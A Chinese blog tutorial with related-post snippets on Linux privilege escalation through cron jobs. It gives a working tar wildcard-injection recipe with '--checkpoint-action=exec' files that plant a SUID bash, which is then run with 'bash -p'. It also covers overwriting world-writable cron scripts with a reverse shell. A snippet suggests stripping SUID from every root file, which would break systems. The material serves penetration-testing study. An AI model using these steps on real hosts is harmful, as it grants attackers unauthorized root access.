Linux提权--定时任务--打包配合 SUID(本地)&文件权限配置不当(WEB+本地)

原创 已于 2024-05-12 16:45:08 修改 · 1k 阅读 · 14 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #服务器 #运维 #笔记 #网络安全 #安全 #web安全

于 2024-05-12 16:44:04 首次发布

免责声明:本文仅做技术交流与学习...

目录

定时任务 打包配合 SUID-本地

原理:

背景:

操作演示:

分析:

实战发现:

定时任务 文件权限配置不当-WEB&本地

操作演示:

定时任务 打包配合 SUID-本地

原理:

提权通过获取计划任务执行文件信息进行提权 .

1、相对路径和绝对路径执行

2、计划任务命令存在参数调用

利用计划任务的备份功能 tar 命令的参数利用 .

(大部分为本地提权)

背景:

定时任务-->
背景:
运维为了防止数据丢失等,写个定时任务进行数据的打包压缩.
由于数据打包压缩tar命令.
tar可以尝试加参数调用其他命令执行
cd /tmp;tar czf /tmp/backup.tar.gz*
来到tmp目录压缩成backup.tar.gz(当前所有)

--(网站和数据库经常进行备份,tar压缩---隔段时间进行打包.)

操作演示:

#tar--checkpoint=1调用其他命令执行
echo "" > --checkpoint=1  
echo "" > "--checkpoint-action=exec=sh test.sh"  
echo 'cp /bin/bash /tmp/bash;chmod +s /tmp/bash' > test.sh  
chmod +x test.sh 
#创建好文件之后把定时任务开起来.

---文件弄好之后,把定时任务开起来--->

--等待定时任务的运行(打包)

-->得到压缩文件和一个bash文件(test.sh没有运行.)

./bash 命令怎么执行呢??? 多加个 -p 参数.

./bash -p

分析:

实战发现:

查看定时任务有没有可利用(tar打包压缩).

定时任务 文件权限配置不当-WEB&本地

--就是权限配置不当,其他的低权限可以调用,执行等等.

利用不安全的权限分配操作导致的定时文件覆盖

chmod 777 775 等 所有者 组 其他成员说明

操作演示:

--定时任务里添加

vim /etc/crontab

111.sh < ps(或反弹命令)

./111/sh  发现没权限执行 ---chmod +x后才可以.(因为需要权限啊,)

所以:

如果root用户给文件 777 的权限,那么其他用户和组都能动他了.

改完之后,(写个反弹命令)

--当文件被计划任务调用的时候就上线了.

Linux-03 定时任务crontab
weixin_45626840的博客
01-20 1067
由于文件权限不当,root用户创建的定时任务所调用的脚本或二进制程序可被低限用户读写,可被低限用户利用。这是《升技术-攻防实战与技巧》给出的方法,书中也给出了例子,但笔者在复现的过程却始终不能成功,问了。文件权限配置不当,使得低限用户可修改,那么低限用户可以指定root用户身份来执行代码达到目的。文件的每一行都应该包含以下字段,指定何时执行任务和要执行的命令。限不是644 的话,里面的任务是不会执行的。如果懂的师傅,也麻烦评论赐教。有一定的文件权限要求,
linux创建定时任务限,利用定时任务(Cronjobs)进行Linux
weixin_30338049的博客
04-30 1398
本文讲解如何利用Linux的Cron Jobs(定时任务)来进行升。cron jobs定时任务(cron job)被用于安排那些需要被周期性执行的命令。利用它,你可以配置某些命令或者脚本,让它们在某个设定的时间内周期性地运行。cron 是 Linux 或者类 Unix 系统中最为实用的工具之一。cron 服务(守护进程)在系统后台运行,并且会持续地检查 /etc/crontab 文件和 /e...
Linux 定时任务
大河之犬的博客
06-19 2077
定时任务(cron job)是Linux系统中的一个守护进程,用于调度重复任务,通过配置crontab可以让系统周期性地执行某些命令或者脚本。cron 是 Linux 系统中最为实用的工具之一,但是也可能被黑客用于操作。由于cron通常以root特运行,如果我们可以修改其调度的任何脚本或二进制文件,那么便可以使用root限执行任意代码。
Linux升—定时任务、环境变量、配置不当、数据库等
剁椒鱼头没剁椒的博客
04-05 2890
在上篇文章中到了Linux升之前的信息收集操作,这里就不在赘述,在前言中讲上篇文章为到的内容进行补充,至于其它内容可参考上篇文章。Linux升—内核、SUID、脏牛等这里将一下在这个中需要注意的事项,总体来说有种莫名的鸡肋感觉。如果备份的文件夹你没有写入限就GG。如果备份的命令是绝对路径也GG。如果管理员设置了其它限也GG。如果是WEB限也GG。可能有些文章中是在定时任务中直接写入压缩命令,来完成压缩的,下面我们就来具体分析一下这两条命令。
crontab定时任务打包备份文件并删除过期文件
KK的博客
06-30 4972
Crontab 示例,最后这里要写成shell脚本定时运行 30 17 * * * cp -rf /usr/local/tomcat9-jforum/tomcat/logs/catalina.out  /usr/local/tomcat9-jforum/logs Crontab归结为以下几点特性: 1.     Crontab约束 2.      Crontab命令
linux利用定时任务
m0_63917373的博客
05-06 545
linux定时任务 linux
Linux
niqiu320的博客
05-24 1397
Linux大全 日站就要日个彻底。往往我们能拿下服务器web服务,却被更新地比西方记者还快的管理员把内网渗透的种子扼杀在的萌芽里面。Linux系统的过程不止涉及到了漏洞,也涉及了很多系统配置Linux信息收集: 什么系统?什么版本? cat /etc/issue cat /etc/*-release cat /etc/lsb-release # Debian based cat /etc/redhat-release # Redhat based 什么内核?是64位吗?
linux限管理及定时任务
2401_86272265的博客
07-30 696
私人定制的升,可以让一个普通用户临时具备root的限。
linux计划任务
2401_83659708的博客
06-17 833
发现有 chkrootkit 软件的脚本(rootkit 是黑客用来入侵的工具,chkrootkit是用来检查 rootkit 是否存在的)发现支持 PUT 方法,利用 PUT 文件上传。-- snip -- 假如不是弱口令游戏继续。history -r #删除当前会话历史记录。获得版本信息可以网上搜索看是否存在公开漏洞。msf 成功上线拿到普通用户。
LINUX之计划任务
小王的储物间
12-14 1045
总结一下本文的知识点,讲了计划任务常用的两种方法以及漏洞探针的安装及使用,有兴趣的小伙伴可以自己尝试去搭建靶机,如果喜欢本文不妨一键三连。
利用定时任务
m0_65267037的博客
04-22 445
​ 我们在拿到shell之后,如果没有现成的内核exp可供使用的话,可以从他们的定时任务入手,看看有没有定时任务调用的脚本文件是我们的shell用户可以修改的,同时又是以 root 用户执行的,然后就可以修改之后静待反弹了。首先,我们需要先看有没有定时任务,然后,我们需要找到当前 shell 对哪些文件拥有 修改 的限,这个文件还需要被定时任务执行,可以使用以下命令。这里我们利用的就是方式一,通过定时任务的文件,将自己的 公钥放入靶机的 authorized_keys 文件,实现攻击机的免密登录。
-Linux定时任务&环境变量&数据库
xhscxj的博客
03-07 382
一、Linux 本地环境变量安全-Aliyun(鸡肋) 配合 SUID 进行环境变量-本地用户环境 手写调用文件-编译-复制文件-增加环境变量-执行触发 gcc demo.c -o shell cp /bin/sh /tmp/ps export PATH=/tmp:$PATH ./shell id 当执行shell命令的时候,默认去调用环境变量ps,而环境变量ps已经被我们覆盖了,就会去执行覆盖后的ps,从而执行sh demo.c内容 ...
Linux 定时任务&环境变量&数据库
qi_SJQ_的博客
02-04 2967
Linux环境变量安全-(aliyun,本地): 前:需要配合SUID进行环境变量且是本地用户环境下进行(因此比较难实现) 过程:手写调用文件-编译-复制文件-增加环境变量-执行触发。 //demo.c文件 #include&lt;unistd.h&gt; void main(){ setuid(0); setgid(0); system("ps"); } gcc demo.c -o shell //手写一个c语言文件,并上传编译为shell文件 cp /bin/sh ...
C语言指针使用及动态分配内存
Web安全工具库
10-23 571
看到你的那一瞬间,就像是走了很远的路,我终于到家了,可是我歇一歇,还是得继续走啊。。。 ---- 网易云热评 一、指针 1、二级指针 #include &lt;stdio.h&gt;int main() { int val = 0; int *p_val = &amp;val; //一级指针 int **pp_val = &amp;p_val; //二级指针 **pp_val/*val变量的存储区*/ = 10; printf("val是%d\n", v.
压缩打包定时任务设置
go|Python的个人博客
12-17 1268
文章目录压缩打包定时任务设置压缩打包Linux中常见压缩与打包方式gzip压缩bzip2压缩tar打包定时任务设置1. 增加定时任务2. 查看corntab定时任务3. 常用命令4.定时任务格式 压缩打包定时任务设置 压缩打包 Linux中常见压缩与打包方式 压缩方式 gzip bzip2 压缩无法压缩目录 打包方式 tar gzip压缩 压缩命令:gzip [压缩文件] 解压命令:gzip -d [压缩包] bzip2压缩 压缩命令:bzip2 [压缩文件]
上传“定时任务“获取系统
SecINAdmin的博客
11-25 278
上传"定时任务"获取系统限 原文来自SecIN社区—作者:tkswifty 相关背景   文件上传是系统中比较常见的业务需求,例如上传头像、简历、报表等。但是如果在业务实现过程中没有考虑相关的安全问题(例如没有对用户上传的文件类型做校验或者校验不充分,导致用户可以上传恶意脚本到服务器)便会导致相关的风险。   Java文件类File以抽象的方式代表文件名和目录路径名。该类主要用于文件和目录的创建、文件的查找和文件的删除等。   一般新建文件是通过将给定路径名字符串转换成抽象路径名来创建一个新File实例:
升】Linux系统&环境变量&定时任务&配置不当&MDUT自动化
今天是几号的博客
03-03 1290
Linux-环境变量文件配合SUID-本地 Linux-定时任务打包配合SUID-本地 Linux-定时任务文件权限配置不当-WEB&本地 Linux-第三方软件MYSQL数据库-WEB&本地 利用phpmailer漏洞进行修改并反弹 1、无法外联走隧道-MDUT自动化数据库 2、利用Mysql searchsploit-手工
linux-环境变量-定时任务
weixin_55885866的博客
11-06 283
一个可执行程序被管理员赋予了suid限,可知此程序内容为调用ps命令,上传bash移动到可执行程序当前目录,并且更改名称为ps,添加环境变量当前目录,程序会调用可执行程序从而调用ps命令,也就是当前bash文件,从而。攻击通过对程序的运行,调试,反编译获知程序运行逻辑,尝试对程序调用的环境变量进行覆盖,导致程序加载继承限。拷贝bash并且重命名为ps:cp /bin/bash /tmp/ps。定时任务执行的sh文件为777所有用户可更改sh脚本数据。
64-Linux定时任务&环境变量&数据库
san3144393495的博客
12-26 998
第一个问题,环境(webshel环境,或者普通本地限),信息收集(用信息收集脚本之后首先看,suid定时任务,可能漏洞*(脚本探针的cve编号漏洞),第三方服务应用(通过脚本手机,比如案例三的mysql数据库作为方式))第二个问题,最新相关漏洞要明确(比如及时更新相关脚本),二次开发展望(对脚本自己进行开发优化,现在是脚本小子的意淫时刻)第三个问题,
扫描可疑文件:find / -uid 0 -perm -4000 查找SUID文件
最新发布
07-01
&lt;think&gt;我们被要求查找系统中可能存在的SUID文件以进行安全检查,特别关注具有SUID限且属于root用户的文件。根据用户供的命令:find/ -uid0 -perm -4000解释:-find /:从根目录开始搜索--uid0 :查找属于用户ID为0(即root用户)的文件--perm -4000:查找设置了SUID位(即限模式中包含4000)的文件但是,注意引用[1]和引用[2]中到的命令,我们也可以使用其他形式,比如:find /-userroot -perm -4000因为root用户的用户ID就是0,所以两种方式等价。另外,引用[3]中到了使用-exec参数来处理找到的文件,但这里我们只需要列出文件。然而,用户命令中使用了-uid0,这可能会包括一些不属于root用户名的文件(因为可能有其他用户也被设置为uid0,但通常只有root是uid0)。所以这个命令是安全的。我们还需要注意,搜索整个文件系统可能需要root限,因为有些目录普通用户无访问。因此,建议使用sudo。因此,正确的命令应该是:sudo find/ -uid0 -perm -40002&gt;/dev/null其中,2&gt;/dev/null是为了将错误信息(如限不足)重定向到空设备,避免显示。另外,引用[2]中到了一个更复杂的find命令,可以同时执行多个操作,但这里我们只需要简单的列出文件。引用[4]到了find命令本身如果具有SUID限,则可能被用于,因此我们需要检查find命令是否在结果中。如果发现find命令设置了SUID位,那么就需要特别注意。引用[5]则与当前问题无关,它是关于文件删除限的。所以,我们执行命令:sudo find/ -uid0 -perm -4000-print2&gt;/dev/null或者,为了显示更详细的信息,我们可以使用:sudo find/ -uid0 -perm -4000-execls -ldb{} \;2&gt;/dev/null这个命令会以长格式列出文件,包括限、所有者、大小、时间等。但是,用户最初的问题只是要求查找,所以我们先列出文件路径。步骤:1.打开终端。2.运行上述命令。注意:由于搜索整个文件系统,可能需要较长时间。另外,我们也可以考虑使用引用[2]中的命令,将结果写入文件,但这里我们直接输出到终端。为了安全起见,我们还可以检查是否有常见的可SUID程序,如nmap、find、vim、bash等。常见可利用的SUID程序列表可以参考GTFOBins(https://gtfobins.github.io/)中标记为SUID的程序。因此,在得到结果后,需要逐一检查这些程序是否在可利用列表中。下面,我们给出具体命令和解释。&lt;/think&gt;### 查找 SUID 文件的安全检查指南 #### 核心命令解析 查找系统中具有 SUID 限且属于 root 用户的文件: ```bash sudo find / -uid 0 -perm -4000 -exec ls -ldb {} \; 2&gt;/dev/null ``` **参数详解**: - `-uid 0`:筛选属于 root 用户(UID=0)的文件 - `-perm -4000`:精确匹配 SUID 限位(`-rwsr-xr-x`) - `-exec ls -ldb {} \;`:以长格式显示文件详细信息(含限和路径) - `2&gt;/dev/null`:忽略限错误等干扰信息 #### 关键安全操作步骤 1. **执行扫描**: ```bash # 仅列出文件路径 sudo find / -uid 0 -perm -4000 2&gt;/dev/null # 详细输出(推荐) sudo find / -uid 0 -perm -4000 -exec ls -ldb {} \; 2&gt;/dev/null ``` 2. **高风险文件识别**: ```bash # 检查常见可程序 sudo find / -uid 0 -perm -4000 \( -name &quot;find&quot; -o -name &quot;nmap&quot; -o -name &quot;vim&quot; -o -name &quot;bash&quot; -o -name &quot;cp&quot; \) 2&gt;/dev/null ``` 3. **结果分析要点**: - 关注非常规路径的可执行文件(如 `/tmp` 下的文件) - 检查第三方工具是否设置 SUID(如 `nmap`) - 识别限异常:`-rwsr-xr-x` 中的 `s` 表示 SUID 4. **安全加固建议**: ```bash # 移除危险文件的 SUID 位(示例) sudo chmod u-s /path/to/risky_program # 批量处理非必要 SUID 文件 sudo find / -uid 0 -perm -4000 -exec chmod u-s {} \; ``` #### SUID 原理与风险 当普通用户执行具有 SUID 限的文件时,会临时获得文件所有者的限(通常为 root)。攻击者可利用此特性: ```mermaid graph LR A[普通用户] --&gt; B(执行 SUID 程序) B --&gt; C{程序是否安全?} C --&gt;|存在漏洞| D[获得 root 限] C --&gt;|安全设计| E[正常执行] ``` #### 常见高风险 SUID 程序 | 程序 | 风险等级 | 加固建议 | 引用 | |---------|----------|-------------------------|------------| | `find` | ⚠️⚠️⚠️ | `chmod u-s /usr/bin/find` | [^4] | | `nmap` | ⚠️⚠️⚠️ | 移除或降 | [GTFOBins] | | `vim` | ⚠️⚠️ | 禁用 SUID | [^1] | | `bash` | ⚠️⚠️⚠️ | 立即移除 SUID | [^3] | | `cp` | ⚠️ | 审计使用场景 | [^5] | &gt; **注意**:`/usr/bin/passwd` 等核心工具需保留 SUID,加固前需评估业务影响[^5]。 #### 自动化监控方案 ```bash # 每日扫描并邮件报警 sudo find / -uid 0 -perm -4000 &gt; /var/log/suid_audit.log mail -s &quot;SUID变更警报&quot; [email protected] &lt; /var/log/suid_audit.log ``` --- ### 相关问题 1. 如何区分必要与非必要的 SUID 限设置? 2. 除了 `find` 命令,还有哪些方法可以检测 SUID 风险? 3. SUID 与 SGID 限在利用上有何本质区别? 4. 如何防止攻击者通过 SUID 程序进行容器逃逸? 5. Linux 限模型中,SUID 与文件删除限的关系是什么?[^5] [^1]: SUID 检测基础命令 [^2]: 复合条件检测技巧 [^3]: 结果处理与加固方法 [^4]: SUID 利用案例 [^5]: 限模型与删除控制
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金灰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值